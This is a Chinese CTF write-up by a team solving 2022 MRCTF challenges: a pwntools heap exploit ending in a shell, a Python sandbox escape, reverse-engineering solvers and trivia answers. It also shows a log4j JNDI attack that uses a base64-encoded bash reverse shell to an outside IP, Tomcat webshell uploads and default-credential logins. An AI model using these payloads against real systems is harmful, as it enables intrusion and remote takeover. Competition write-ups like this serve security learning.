2022 MRCTF 部分题目 Writeup By Xp0int xp0int Posted on Apr 25 2022 ## 1. PWN ### 1.1 ezbash `Author: xf1les & c1ark` 程序实现了类似 bash 的 shell,内置了`cp`、`cat`等命令。 表示文件的结构体:  第一处漏洞位于`sub_16E2`,`cp`命令复制文件内容时没有附加空字节,可以泄漏 libc 地址:  第二处漏洞位于`sub_17E7`,同样是`cp`命令。当`cp`覆盖原有文件且目的文件`src`比源文件`dest`大时,`realloc`返回的指针会覆盖`dest`指针,导致任意地址写。  EXP 脚本如下: ``` #!/usr/bin/env python3 from pwn import * import warnings warnings.filterwarnings("ignore", category=BytesWarning) context(arch="amd64") context(log_level="debug") libc = ELF("./libc.so.6") p_sl = lambda x, y : p.sendlineafter(y, str(x) if not isinstance(x, bytes) else x) p_s = lambda x, y : p.sendafter(y, str(x) if not isinstance(x, bytes) else x) libc_sym = lambda x : libc.symbols[x] libc_symp = lambda x : p64(libc.symbols[x]) libc_os = lambda x : libc.address + x p = remote("140.82.17.215", 21441) # ~ p = process("./ezbash") def touch(fn): p_sl(f"touch {fn}", "[0m") def echo(fn, ctx): p_s("echo ", "[0m") p.send(ctx) p.sendline(f" -> {fn}") def cp(a, b): p_sl(f"cp {a} {b}", "[0m") def cat(fn): p_sl(f"cat {fn}", "[0m") ## leak touch("pwn") echo("pwn", "A"*0x1500) echo("pwn", "A"*8) cp('pwn', 'leak') cat('leak') p.recvuntil('A'*8) libc.address = u64(p.recv(6).ljust(8, b'\x00')) - (0x1ebbe0+0x1000) info("libcbase: 0x%lx", libc.address) ## overwrite __free_hook touch("src") touch("dst") pp = (b'A'*0x30+libc_symp('system')).strip(b'\x00') echo("src", pp) pp = (b'A'*0x18+p64(libc_sym('__free_hook')-0x30)).strip(b'\x00') echo("dst", pp) cp("src", "dst") ## getshell p.sendline("/bin/sh") p.interactive() ```  ### 1.2 Dynamic `Author: xf1les` Python 沙盒逃逸。 参考 [CTF Wiki](https://ctf-wiki.org/pwn/sandbox/python/python-sandbox-escape/),利用`func`的内部属性调用`os._wrap_close`类内部的`open`和`read`函数读取 flag。 ``` fd = func.__class__.__bases__[0].__subclasses__()[-4].__init__.__globals__["op" + "en"]('flag', 0) print(func.__class__.__bases__[0].__subclasses__()[-4].__init__.__globals__["read"](fd, 0x100)) EOF ```  ## 2. RE ### 2.1 encfs `Author: JANlittle & xf1les` 内核题,用mount挂载文件系统拿到encfs.ko和flag文件,分析encfs.ko可以得到write和openat两个系统调用被hook了,其中对文件内容做修改的是write的hook。分析write的hook函数NuniKYgPVMEd,可以知道主要逻辑为对初始值全为0的明文进行SM4迭代加密得到一系列密文,再用得到的密文与要写入的文件内容xor后循环右移再写入文件。写一个简单gdb脚本对encfs.ko进行调试取到要xor的密文,再逆回去即可。 ```cpp #include <cstdio> #include "D:\Ctf-tools\Reverse\IDA7.5\plugins\defs.h" using namespace std; int main() { FILE *fp = fopen("flag", "rb"); char flag[44] = {0}; fread(flag, 1, 43, fp); unsigned char xor_key[44] = {0xc8, 0x1c, 0xe7, 0x89, 0xdb, 0x71, 0x55, 0x3f, 0xc2, 0x2c, 0x9d, 0xf5, 0x11, 0x55, 0x8e, 0x9a, 0x66, 0x9a, 0x2d, 0xcc, 0x0d, 0xc7, 0x88, 0x01, 0x2e, 0x97, 0x54, 0x21, 0xfc, 0xd5, 0xdc, 0x03, 0x3e, 0x99, 0x98, 0x0c, 0x01, 0x92, 0xc0, 0xed, 0x21, 0x79, 0x9c, 0xe8}; for (size_t i = 0; i < 43; i++) flag[i] = __ROL1__(flag[i], 3) ^ xor_key[i]; printf("%s", flag); return 0; } ``` ### 2.2 Cicada `Author: JANlittle` PE64文件,病毒分析类的,主要代码需要SMC,API调用使用GetProcAddress来隐式调用,直接动调一步步跟可以得到大致流程: ``` 长度要为32 (_int128)input = str2hex(input) qword a[4]; a[i]=*(int*)(&input+4*i) a[i]=a[i]^(a[i]<<3&0xffffffff)^i qword b[16]; b[i]=*(char*)(&a[i/4]+i%4) 16个线性方程验证 ``` 中间对flag的加密和验证都是采用的类似VM的形式进行操作,opcode找不到,所以直接断在指令执行那里就行 ```python from z3 import * def getAnsOfPowerOfTwo(a, b): ans = 0 for i in range(a, b): ans += pow(2, i) return ans def getBit(n, i): t = pow(2, i) return (t & n) >> i def leftShiftXor(n, m): r = n & getAnsOfPowerOfTwo(0, m) l = n & getAnsOfPowerOfTwo(m, 32) t = r for i in range(m, 32): t_i = getBit(t, i - m) ^ getBit(n, i) t += t_i << i return t & 0xffffffff b = [Int('b%d' % i) for i in range(16)] s = Solver() for i in range(16): s.add(b[i] >= 0) s.add(b[i] <= 255) s.add(0xa5*b[0] + 0xce*b[1] + 0xb8*b[2] + 0xbc*b[3] + 0x99*b[4] + 0xb7*b[5] + 0xe9*b[6] + 0xa0*b[7] + 0xc1 * b[8] + 0xff*b[9] + 0x14*b[10] + 0x5c*b[11] + 0x22*b[12] + 0x66*b[13] + 0x85*b[14] + 0x51*b[15] == 0x41DC4) s.add(0xa0*b[0] + 0xc*b[1] + 0x70*b[2] + 0x3e*b[3] + 0x16*b[4] + 0x34*b[5] + 0x9a*b[6] + 0x1c*b[7] + 0xa6 * b[8] + 0x47*b[9] + 0x56*b[10] + 0x46*b[11] + 0x4e*b[12] + 0x1c*b[13] + 0xb3*b[14] + 0xdd*b[15] == 0x33C67) s.add(0xbc*b[0] + 0x76*b[1] + 0xf4*b[2] + 0x6b*b[3] + 0x64*b[4] + 0xce*b[5] + 0x40*b[6] + 0xc6*b[7] + 0xcf * b[8] + 0x53*b[9] + 0x9b*b[10] + 0x38*b[11] + 0x36*b[12] + 0x30*b[13] + 0x15*b[14] + 0xdc*b[15] == 0x36e79) s.add(0x4f*b[0] + 0xd*b[1] + 0x41*b[2] + 0x4b*b[3] + 0x67*b[4] + 0xd8*b[5] + 0xe9*b[6] + 0x78*b[7] + 0xb1 * b[8] + 0xc5*b[9] + 0x0*b[10] + 0xd9*b[11] + 0xde*b[12] + 0x93*b[13] + 0xd8*b[14] + 0xc8*b[15] == 0x47569) s.add(0xed*b[0] + 0x12*b[1] + 0x96*b[2] + 0x28*b[3] + 0x45*b[4] + 0xe2*b[5] + 0xe2*b[6] + 0x4b*b[7] + 0x1 * b[8] + 0x7d*b[9] + 0xe3*b[10] + 0x13*b[11] + 0x8b*b[12] + 0x77*b[13] + 0x6a*b[14] + 0x58*b[15] == 0x30cb6) s.add(0x6c*b[0] + 0x5*b[1] + 0x6d*b[2] + 0x8a*b[3] + 0x62*b[4] + 0xbd*b[5] + 0xb8*b[6] + 0x98*b[7] + 0xb3 * b[8] + 0x9c*b[9] + 0xdf*b[10] + 0x10*b[11] + 0xc2*b[12] + 0x4d*b[13] + 0x77*b[14] + 0x87*b[15] == 0x3a143) s.add(0xe0*b[0] + 0xa8*b[1] + 0x85*b[2] + 0x3b*b[3] + 0x64*b[4] + 0x7a*b[5] + 0x37*b[6] + 0xf7*b[7] + 0xfe * b[8] + 0x84*b[9] + 0xd2*b[10] + 0x37*b[11] + 0x48*b[12] + 0xc6*b[13] + 0xec*b[14] + 0x8d*b[15] == 0x417df) s.add(0x9e*b[0] + 0xfd*b[1] + 0xdb*b[2] + 0x43*b[3] + 0x30*b[4] + 0x6a*b[5] + 0x6d*b[6] + 0x42*b[7] + 0x55 * b[8] + 0xd5*b[9] + 0xda*b[10] + 0x32*b[11] + 0x23*b[12] + 0xd2*b[13] + 0xf6*b[14] + 0xe3*b[15] == 0x3edc2) s.add(0x3c*b[0] + 0x43*b[1] + 0xab*b[2] + 0xec*b[3] + 0xea*b[4] + 0x1e*b[5] + 0xa7*b[6] + 0x92*b[7] + 0x6f * b[8] + 0x70*b[9] + 0x52*b[10] + 0xeb*b[11] + 0x96*b[12] + 0xa2*b[13] + 0x3*b[14] + 0x43*b[15] == 0x3c685) s.add(0x8e*b[0] + 0xfb*b[1] + 0x73*b[2] + 0xbe*b[3] + 0xf8*b[4] + 0x67*b[5] + 0x72*b[6] + 0x3f*b[7] + 0x3f * b[8] + 0x77*b[9] + 0xd8*b[10] + 0x89*b[11] + 0x28*b[12] + 0xa8*b[13] + 0xbf*b[14] + 0xa4*b[15] == 0x3CFB4) s.add(0xaa*b[0] + 0xe8*b[1] + 0xef*b[2] + 0x83*b[3] + 0xff*b[4] + 0x56*b[5] + 0x9a*b[6] + 0xe3*b[7] + 0xfb * b[8] + 0x4a*b[9] + 0x4a*b[10] + 0x76*b[11] + 0x9d*b[12] + 0x95*b[13] + 0x17*b[14] + 0x41*b[15] == 0x3EC38) s.add(0xe4*b[0] + 0xa*b[1] + 0x1d*b[2] + 0x42*b[3] + 0xe3*b[4] + 0x3d*b[5] + 0x2d*b[6] + 0x57*b[7] + 0x18 * b[8] + 0x8a*b[9] + 0xc3*b[10] + 0x5b*b[11] + 0xfa*b[12] + 0x59*b[13] + 0x38*b[14] + 0x92*b[15] == 0x2D960) s.add(0xd1*b[0] + 0xa1*b[1] + 0x39*b[2] + 0x47*b[3] + 0xca*b[4] + 0xab*b[5] + 0x78*b[6] + 0xb3*b[7] + 0x4b * b[8] + 0x19*b[9] + 0xa1*b[10] + 0x21*b[11] + 0x84*b[12] + 0x26*b[13] + 0x90*b[14] + 0x50*b[15] == 0x2AEF0) s.add(0x47*b[0] + 0x2f*b[1] + 0xc1*b[2] + 0x19*b[3] + 0x19*b[4] + 0x73*b[5] + 0x8*b[6] + 0x51*b[7] + 0x89 * b[8] + 0x17*b[9] + 0x82*b[10] + 0xf1*b[11] + 0xc0*b[12] + 0x6d*b[13] + 0xcb*b[14] + 0x74*b[15] == 0x321B7) s.add(0x5a*b[0] + 0x75*b[1] + 0x71*b[2] + 0x81*b[3] + 0x74*b[4] + 0xa4*b[5] + 0xa9*b[6] + 0xca*b[7] + 0x6 * b[8] + 0xe5*b[9] + 0x41*b[10] + 0x34*b[11] + 0x74*b[12] + 0xde*b[13] + 0xd6*b[14] + 0x38*b[15] == 0x3611A) s.add(0x5f*b[0] + 0x74*b[1] + 0x47*b[2] + 0x89*b[3] + 0xc1*b[4] + 0x91*b[5] + 0x69*b[6] + 0xf7*b[7] + 0x39 * b[8] + 0x24*b[9] + 0xfd*b[10] + 0x93*b[11] + 0xa3*b[12] + 0x6a*b[13] + 0xdf*b[14] + 0x14*b[15] == 0x3333E) if s.check() == sat: m = s.model() enc = [m[b[i]].as_long() for i in range(16)] flag = [int.from_bytes(bytes(enc[4*i:4*(i+1)]), 'little') ^ i for i in range(4)] for i in range(4): flag[i] = leftShiftXor(flag[i], 3) flag_byte = b''.join([flag[i].to_bytes(4, 'big') for i in range(4)]) for i in range(16): print(hex(flag_byte[i])[2:].zfill(2), end='') ``` ## 3. MISC ### 3.1 ReadLongNovel `Author: hututu` 信息搜索题,对着题目在谷歌上搜即可: { "14": { "answer": "数字化改造", "question": "四级文明迈向五级文明的经典标志是" }, "19": { "answer": "启迪者文明", "question": "格利泽文明遇到的第一个星际文明是哪个文明" }, "5": { "answer": "3", "question": "在飞船上的第一次考试中,张远在太空机械学专业排名是多少?" }, "1": { "answer": "卡普坦", "question": "飞船黄金太阳号的航行目标是哪里?" }, "49": { "answer": "五千万", "question": "泰坦级巨型母舰能够容纳多少万人口" }, "30": { "answer": "启程号", "question": "新人类第一艘泰坦级巨型母舰被命名为什么" }, "6": { "answer": "深空基金会", "question": "在地球上,张远将所有财产,捐赠给了哪个组织?" }, "16": { "answer": "林方正", "question": "社会公养体系由哪位教授提出" }, "45": { "answer": "克隆", "question": "半球明的主要繁殖方式是什么" }, "26": { "answer": "阿列夫文明", "question": "银河系未来将成为哪个生物的标准智慧单元" }, "42": { "answer": "好友兼师兄", "question": "赵青锋和张远的关系是" }, "20": { "answer": "六亿", "question": "在虚拟世界所有回归者中排名第一的传奇人物获得了多少亿分?" }, "28": { "answer": "文学作家", "question": "林青青在老年时期成为了什么" }, "4": { "answer": "李俊康", "question": "\"鹰隼一号\"驱逐舰的舰长是谁?" }, "35": { "answer": "计算", "question": "新文明史学的核心思想是通过什么方法来规划文明的未来走向" }, "38": { "answer": "冬眠", "question": "地球文明数千亿计的人们通过什么方式来逃避现实" }, "29": { "answer": "2509", "question": "黄金太阳号于纪元多少年离开母星地球" }, "12": { "answer": "阿米巴文明", "question": "银河系的第三任治理者是哪个文明" }, "31": { "answer": "抗打击能力", "question": "战星相较于飞船什么能力最为突出" }, "9": { "answer": "陈牧", "question": "人类第一次来到环泰文明交易市场时,由谁负责对接?" }, "47": { "answer": "万物理论", "question": "深空大学的学术期刊名为?" }, "27": { "answer": "新文明史学", "question": "人类获得格利泽文明的详细历史资料是为了完善什么?" }, "11": { "answer": "塔比文明", "question": "哪个文明委托棘哈曼文明建造了戴森球" }, "46": { "answer": "一级", "question": "可控核聚变技术属于几级文明?" }, "24": { "answer": "五个", "question": "超凡者考核中,至少完成几个轮回可以选择通过考核" }, "39": { "answer": "仙女星系", "question": "阿米巴文明起源于哪个星系?" }, "0": { "answer": "两艘", "question": "地球上的人类一共发射了几艘深空殖民舰" }, "10": { "answer": "180", "question": "租用一艘小型曲率飞船需要多少阿米巴积分?" }, "32": { "answer": "曲率科技", "question": "哪种科技是四级文明的核心技术" }, "34": { "answer": "大目标", "question": "五级文明在哲学层面最大的难点是培养永恒的什么?" } } 可能是匹配问题,写答案的时候尽可能用词语不用句子。提交后即可得到flag:MRCTF{愿您的+文明+永远进步}. ## 4. BONUS ### 4.1 Java_mem_shell_Filter `Author: ABU` 经典漏洞log4j,使用工具JNDI-Injection-Exploit-1.0.jar,z在vps上执行`java -jar JNDI-Injection-Exploit-1.0.jar -C "bash -c {echo,YmFzaCAtaSA+IC9kZXYvdGNwLzEyMS41LjIzOC41Mi8zMDY2MCAwPiYx}|{base64,-d}|{bash,-i}" -A "vps"`(base64 编码部分为Linux 反弹shell) 然后在vps上开启监听,burp发送payload POST /MyServlet HTTP/1.1 Host: 106.75.33.92:8888 Content-Length: 58 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://106.75.33.92:8888 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://106.75.33.92:8888/ Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: JSESSIONID=69C73CB7EA1030A2098BDF9910465525 Connection: close name=${jndi:ldap://vps:1389/cqv147}&password=ssss 成功反弹shell  又要寻找flag,为方便寻找,在/usr/local/apache-tomcat-8.0.12/webapps/shell/写入了shell.jsp,然后用冰蝎连接  下载e.bin发现flag  Flag:MRCTF{7hi3_is_a_Fi1ter_TpYe_Mem3he1l} ### 4.2 Java_mem_shell_Basic `Author: ABU` Tomcat 经典漏洞,使用默认密码tomcat:tomcat登录,上传war,用冰蝎连接webshell 在/usr/local/apache-tomcat-8.0.12/work/Catalina/localhost/ROOT/org/apache/jsp/threatbook_jsp.java处发现flag  Flag:MRCTF{Th1s_i5_4_Web5he11_l04ded_wi7h_JSPL0ader} 打赏还是打残,这是个问题 赏 Wechat Pay Alipay 2022 广东省大学生网络攻防大赛部分题目 Writeup By Xp0int 2022 虎符网络安全赛道部分题目 Writeup By Xp0int
没有帐号? 立即注册